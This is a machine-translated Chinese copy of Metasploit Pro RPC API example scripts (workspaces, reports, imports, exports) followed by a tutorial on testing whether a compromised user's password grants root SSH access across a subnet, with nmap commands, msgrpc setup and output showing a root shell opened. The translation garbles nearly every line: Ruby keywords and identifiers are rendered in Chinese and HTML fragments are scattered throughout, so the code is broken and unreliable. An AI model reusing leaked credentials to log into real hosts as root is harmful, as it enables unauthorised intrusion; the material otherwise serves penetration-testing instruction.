RPC API的示例用法据span title="Copy link to clipboard">
下面的脚本提供了如何使用RPC API执行常见任务的示例。这些例子可以在据Code class="prism-code language-text">metasploit /应用程序/ pro / api示例据/span>。据/p>
添加工作区据span title="Copy link to clipboard">
1据/div>
#据/span>
2据/div>
# 笔记据/span>:据/span>工作区和项目是相同的据/span>。据/span>
3.据/div>
#据/span>
4.据/div>
require_relative据/span>“metasploit_rpc_client”据/span>
5.据/div>
workspace_attrs据/span>=据/span>{据/span>
6.据/div>
7.据/div>
姓名据/span>:据/span>“富豪最优秀”据/span>那据/span>
8.据/div>
limit_to_network.据/span>:据/span>真正的据/span>那据/span>
9.据/div>
边界据/span>:据/span>“10.2.3.1-10.2.3.24”据/span>那据/span>
10据/div>
描述据/span>:据/span>“对Foocorp的关键任务内部地震局域网的考验。”据/span>
11据/div>
}据/span>
12据/div>
13据/div>
#从cli设置的东西据/span>
14据/div>
api_token.据/span>=据/span>argv.据/span>[据/span>0.据/span>]据/span>
15据/div>
宿主据/span>=据/span>argv.据/span>[据/span>1据/span>]据/span>
16据/div>
17据/div>
#制作客户据/span>-据/span>将SSL设置为据/span>真正的据/span>在据/span>安装环境据/span>
18据/div>
客户据/span>=据/span>metasproitrpcclient.据/span>。据/span>新据/span>(据/span>宿主据/span>:据/span>宿主据/span>那据/span>令牌据/span>:据/span>api_token.据/span>那据/span>ssl据/span>:据/span>错误的据/span>那据/span>港口据/span>:据/span>50505据/span>)据/span>
19据/div>
客户据/span>。据/span>调用据/span>“pro.workspace_add”据/span>那据/span>workspace_attrs据/span>
清单、下载和生成报告据span title="Copy link to clipboard">
ruby据div class="code-copy" title="Copy to clipboard">
1据/div>
#报告列表的例子据/span>那据/span>下载据/span>那据/span>通过RPC API的一代据/span>。据/span>
2据/div>
#据/span>
3.据/div>
#使用据/span>:据/span>
4.据/div>
#ruby report_api_test.据/span>。据/span>rb据/span>据据/span>服务钥匙据/span>>据/span>据据/span>MSPro实例据/span>>据/span>' < WorkspaceName >”据/span>
5.据/div>
#据/span>
6.据/div>
#服务密钥据/span>:据/span>从全局设置生成API令牌据/span>那据/span>需要据/span>
7.据/div>
#Pro许可的实例据/span>。据/span>
8.据/div>
# MSPro实例据/span>:据/span>127.0据/span>.0据/span>.1据/span>如果据/span>在本地跑步据/span>
9.据/div>
#据/span>
10据/div>
#据/span>
11据/div>
12据/div>
require_relative据/span>“metasploit_rpc_client”据/span>
13据/div>
14据/div>
#从cli设置的东西据/span>
15据/div>
api_token.据/span>=据/span>argv.据/span>[据/span>0.据/span>]据/span>
16据/div>
宿主据/span>=据/span>argv.据/span>[据/span>1据/span>]据/span>
17据/div>
workspace_name.据/span>=据/span>argv.据/span>[据/span>2据/span>]据/span>
18据/div>
19据/div>
#制作客户据/span>
20.据/div>
客户据/span>=据/span>metasproitrpcclient.据/span>。据/span>新据/span>(据/span>宿主据/span>:据/span>宿主据/span>那据/span>令牌据/span>:据/span>api_token.据/span>那据/span>ssl据/span>:据/span>错误的据/span>那据/span>港口据/span>:据/span>50505据/span>)据/span>
21据/div>
22据/div>
# #报告据/span>
23据/div>
#列表报告类型据/span>
24据/div>
type_list.据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.list_report_types'据/span>)据/span>
25据/div>
put据/span>“允许的报告类型:\ n#{type_list}”据/span>
26据/div>
27据/div>
#列表当前报告据/span>
28据/div>
#eport_list.据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.report_list'据/span>那据/span>workspace_name.据/span>)据/span>
29据/div>
#PLES.据/span>“\ n \ nexisting报告:#{eport_list} \ n”据/span>
30.据/div>
31据/div>
#下载报告文物据/span>
32据/div>
#export_artifact_id.据/span>=据/span>1据/span>
33据/div>
#artifact.据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>“pro.report_artifact_download”据/span>那据/span>report_artifact_id据/span>)据/span>
34据/div>
# tmp_path据/span>=据/span>“/ tmp / report_ # {report_artifact_id} # {File.extname(工件[' file_path '])}”据/span>
35据/div>
# 文件据/span>。据/span>开放据/span>(据/span>tmp_path.据/span>那据/span>'W'据/span>)据/span>{据/span>|据/span>C据/span>|据/span>C据/span>。据/span>写作工件据/span>[据/span>“数据”据/span>]据/span>}据/span>
36据/div>
#PLES.据/span>"将报告工件#{report_artifact_id}写入#{tmp_path}"据/span>
37据/div>
38据/div>
#创建报告据/span>
39据/div>
#export_hash.据/span>=据/span>{据/span>工作空间据/span>:据/span>workspace_name.据/span>那据/span>
40据/div>
#名称据/span>:据/span>“supertest _#{time.now.to_i_i}”据/span>那据/span>
41据/div>
# report_type据/span>:据/span>:据/span>审计据/span>那据/span>
42据/div>
#se_campaign_id.据/span>:据/span>1据/span>那据/span>
43据/div>
# 由...制作据/span>:据/span>'你是谁'据/span>那据/span>
44据/div>
# file_formats据/span>:据/span>[据/span>:据/span>PDF.据/span>]据/span>
45据/div>
#据/span>}据/span>
46据/div>
# report_creation据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.start_report'据/span>那据/span>报告_hash.据/span>)据/span>
47据/div>
#PLES.据/span>“\ n \ nCreated报告:\ n # {report_creation}”据/span>
48据/div>
49据/div>
##下载报告和子工件据/span>
50据/div>
#eport_id.据/span>=据/span>1据/span>
51据/div>
# 报告据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>“pro.report_download”据/span>那据/span>Report_id.据/span>)据/span>
52据/div>
# 报告据/span>[据/span>'report_artifacts'据/span>]据/span>。据/span>每个_with_index.据/span>做据/span>|据/span>一种据/span>那据/span>一世据/span>|据/span>
53据/div>
# tmp_path据/span>=据/span>“/tmp/report_test_# {i} _#(time.now.to_i }# {file.extname(a['file_path'])}”据/span>
54据/div>
# 文件据/span>。据/span>开放据/span>(据/span>tmp_path.据/span>那据/span>'W'据/span>)据/span>{据/span>|据/span>C据/span>|据/span>C据/span>。据/span>写一个据/span>[据/span>“数据”据/span>]据/span>}据/span>
55据/div>
#PLES.据/span>“将报告工件#{report_id}写入#{tmp_path}”据/span>
56.据/div>
# 结尾据/span>
导入数据据span title="Copy link to clipboard">
ruby据div class="code-copy" title="Copy to clipboard">
1据/div>
#据/span>
2据/div>
通过RPC API导入数据的示例据/span>。据/span>
3.据/div>
#据/span>
4.据/div>
#使用据/span>:据/span>
5.据/div>
# ruby import_api_test据/span>。据/span>rb据/span>据据/span>服务的关键据/span>>据/span>据据/span>MSPro实例据/span>>据/span>\据/span>
6.据/div>
#据/span><项目名称>的据/span>\据/span>
7.据/div>
#据/span>'<导入文件的完整路径>'据/span>
8.据/div>
#据/span>
9.据/div>
#服务密钥据/span>:据/span>从全局设置生成API令牌据/span>那据/span>需要据/span>
10据/div>
#Pro许可的实例据/span>。据/span>
11据/div>
# MSPro实例据/span>:据/span>127.0据/span>.0据/span>.1据/span>那据/span>如果据/span>在本地跑步据/span>
12据/div>
# 项目名据/span>:据/span>要导入的现有工作区的名称据/span>
13据/div>
#导入文件路径据/span>:据/span>支持支持文件的完全限定路径据/span>
14据/div>
#格式据/span>
15据/div>
#据/span>
16据/div>
require_relative据/span>“metasploit_rpc_client”据/span>
17据/div>
18据/div>
# CLI参数据/span>
19据/div>
api_token.据/span>=据/span>argv.据/span>[据/span>0.据/span>]据/span>
20.据/div>
宿主据/span>=据/span>argv.据/span>[据/span>1据/span>]据/span>
21据/div>
workspace_name.据/span>=据/span>argv.据/span>[据/span>2据/span>]据/span>
22据/div>
import_file_path.据/span>=据/span>argv.据/span>[据/span>3.据/span>]据/span>
23据/div>
24据/div>
除非API_Token.据/span>&&据/span>宿主据/span>&&据/span>workspace_name.据/span>
25据/div>
提出例外据/span>那据/span>“你必须指定一个API令牌、一个实例地址和一个工作空间名称。”据/span>
26据/div>
结尾据/span>
27据/div>
除非import_file_path.据/span>
28据/div>
提出例外据/span>那据/span>'你必须指定导入文件路径。'据/span>
29据/div>
结尾据/span>
30.据/div>
31据/div>
#制作客户据/span>
32据/div>
客户据/span>=据/span>metasproitrpcclient.据/span>。据/span>新据/span>(据/span>宿主据/span>:据/span>宿主据/span>那据/span>令牌据/span>:据/span>api_token.据/span>那据/span>ssl据/span>:据/span>错误的据/span>那据/span>港口据/span>:据/span>50505据/span>)据/span>
33据/div>
34据/div>
#导入配置据/span>
35据/div>
import_hash.据/span>=据/span>{据/span>
36据/div>
工作空间据/span>:据/span>workspace_name.据/span>那据/span>
37据/div>
#切换数据存储选项据/span>(据/span>记录据/span>那据/span>有一些例外据/span>那据/span>喜欢据/span>
38据/div>
#这个好用的据/span>)据/span>依然据/span>:据/span>
39据/div>
#ds_autotag_os.据/span>:据/span>真正的据/span>那据/span>
40据/div>
#todo更新使用正确的路径据/span>:据/span>
41据/div>
DS_PATH据/span>:据/span>import_file_path.据/span>
42据/div>
}据/span>
43据/div>
44据/div>
进口据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>“pro.start_import”据/span>那据/span>import_hash.据/span>)据/span>
45据/div>
put据/span>“\ ntarted导入:\ n#{import}”据/span>
导出数据据span title="Copy link to clipboard">
ruby据div class="code-copy" title="Copy to clipboard">
1据/div>
#出口列表的例子据/span>那据/span>下载据/span>那据/span>和一代通过据/span>
2据/div>
# RPC API据/span>。据/span>
3.据/div>
#据/span>
4.据/div>
#使用据/span>:据/span>
5.据/div>
# ruby export_api_test据/span>。据/span>rb据/span>据据/span>服务钥匙据/span>>据/span>据据/span>MSPro实例据/span>>据/span>' < WorkspaceName >”据/span>
6.据/div>
#据/span>
7.据/div>
#服务密钥据/span>:据/span>从全局设置生成API令牌据/span>那据/span>需要据/span>
8.据/div>
#Pro许可的实例据/span>。据/span>
9.据/div>
# MSPro实例据/span>:据/span>127.0据/span>.0据/span>.1据/span>如果据/span>在本地跑步据/span>
10据/div>
#据/span>
11据/div>
#据/span>
12据/div>
13据/div>
require_relative据/span>“metasploit_rpc_client”据/span>
14据/div>
15据/div>
#从cli设置的东西据/span>
16据/div>
api_token.据/span>=据/span>argv.据/span>[据/span>0.据/span>]据/span>
17据/div>
宿主据/span>=据/span>argv.据/span>[据/span>1据/span>]据/span>
18据/div>
workspace_name.据/span>=据/span>argv.据/span>[据/span>2据/span>]据/span>
19据/div>
20.据/div>
#制作客户据/span>
21据/div>
客户据/span>=据/span>metasproitrpcclient.据/span>。据/span>新据/span>(据/span>宿主据/span>:据/span>宿主据/span>那据/span>令牌据/span>:据/span>api_token.据/span>那据/span>ssl据/span>:据/span>错误的据/span>那据/span>港口据/span>:据/span>50505据/span>)据/span>
22据/div>
23据/div>
###导出据/span>
24据/div>
##列出当前导出据/span>
25据/div>
export_list据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.export_list'据/span>那据/span>workspace_name.据/span>)据/span>
26据/div>
put据/span>“现有导出:#{export_list}”据/span>
27据/div>
28据/div>
# #创造出口据/span>
29据/div>
# export_types据/span>=据/span>[据/span>'zip_workspace'据/span>那据/span>“xml”据/span>那据/span>“replay_scripts”据/span>那据/span>“pwdump”据/span>]据/span>
30.据/div>
# export_config据/span>=据/span>{据/span>由...制作据/span>:据/span>'你是谁'据/span>那据/span>
31据/div>
#export_type.据/span>:据/span>export_types据/span>[据/span>0.据/span>]据/span>那据/span>
32据/div>
#工作区据/span>:据/span>workspace_name.据/span>}据/span>
33据/div>
#export_creation.据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.start_export'据/span>那据/span>export_config.据/span>)据/span>
34据/div>
#PLES.据/span>“创建导出:#{export_creation}”据/span>
35据/div>
36据/div>
##下载导出据/span>
37据/div>
#export_id.据/span>=据/span>1据/span>
38据/div>
#出口据/span>=据/span>客户据/span>。据/span>调用据/span>(据/span>'pro.export_download'据/span>那据/span>export_id.据/span>)据/span>
39据/div>
# tmp_path据/span>=据/span>“/tmp/export_test_#(export_id }# {file.extname(进口['file_path'])}”据/span>
40据/div>
# 文件据/span>。据/span>开放据/span>(据/span>tmp_path.据/span>那据/span>'W'据/span>)据/span>{据/span>|据/span>C据/span>|据/span>C据/span>。据/span>写出口据/span>[据/span>“数据”据/span>]据/span>}据/span>
41据/div>
#PLES.据/span>“将导出#{export_id}写入#{tmp_path}”据/span>
教程据span title="Copy link to clipboard">
找到Linux服务器,允许我使用已知的凭据以root身份登录。据/p>
让我们制定测试场景。通过一种方法或另一个方法,我已经获得了单个用户的清晰文本密码 - Bob。我有Bob的Windows凭据,可以通过RDP或PSExec轻松访问他的机器。我确定了Bob是一个Linux管理员。我希望确定什么,如果有的话,如果有的话,请允许我使用Bob受到影响的密码登录“root”。有许多方法可以实现这一目标。以下是一种这样的方法。据/p>
1据/div>
NMAP 10.0.1.1/24 -p22-og ssh_scan.gnmap据/span>
文件ssh_scan.gnmap包含我们的实时主机和SSH的状态。我们需要清理结果文件,仅在SSH“Open”中的那些主机中磨练。以下命令只是它并将目标IP保存到单独的文件中:据/p>
1据/div>
猫ssh_scan。Gnmap | grep open | cut -d " " -f 2 > ssh_hosts.txt据/span>
我们现在有一个名为ssh_hosts.txt的文件,其中包含运行ssh的IP地址列表。接下来,让我们开始METASPLOIT和MSGRPC接口:据/p>
1据/div>
msfconsole msf exploit(handler) > load msgrpc Pass=pa55w0rd据/span>
2据/div>
[*] MSGRPC服务:127.0.0.1:55552据/span>
3.据/div>
[*] MSGRPC用户名:msf据/span>
4.据/div>
[*] MSGRPC密码:pa55w0rd据/span>
5.据/div>
[*]成功加载插件:MSGRPC MSF Exploit(Handler)>据/span>
此时,Metasploit的RPC接口正在侦听端口55552.我们可以继续编写我们的Python脚本以自动化测试SSH登录的任务。在继续之前,我强烈建议您查看Metasploit的远程API文档。以下伪代码解决了我们的需求:据/p>
- 认证到Metasploit的MSGRPC接口(用户名:msf,密码:pa55w0rd)。据/li>
- 创建Metasploit控制台。据/li>
- 对于文件中的每个Linux主机,使用Bob的受损密码的“S3CR3T”运行SSH_Login模块。据/li>
- 销毁Metasploit控制台(清理以保存资源)。据/li>
- 与任何已建立的SSH会话进行交互。据/li>
下面是完整的Python源代码清单(请注意,我不是程序员)。为了继续进行测试,我更新了脚本顶部的用户设置,以反映“root”的用户名和“s3cr3t”的密码(这是Bob泄露的密码)。保存更改并运行Python脚本:据/p>
1据/div>
./msfrpc_ssh_scan.py.py.据/span>
2据/div>
[+]认证成功据/span>
3.据/div>
[+]控制台0创建[!]测试主机10.0.1.43据/span>
4.据/div>
[+]列表会话...会话ID目标1 root@10.0.1.43据/span>
查看会话清单,该脚本在主机10.0.1.43上使用Bob的密码成功地进行了“root”身份验证。我们之前启动的Metasploit控制台证实了这一事实:据/p>
1据/div>
MSF Exproit(Handler)>据/span>
2据/div>
[*]命令shell会话1打开(10.0.2.10:43863 - > 10.0.1.43:22)...据/span>
3.据/div>
MSF利用(处理程序)>会话据/span>
4.据/div>
活跃期据/span>
5.据/div>
===============.据/span>
6.据/div>
1 shell linux ssh root:s3cr3t(10.0.1.43:22)10.0.2.10:43863 - > 10.0.1.43:22(10.0.1.43)据/span>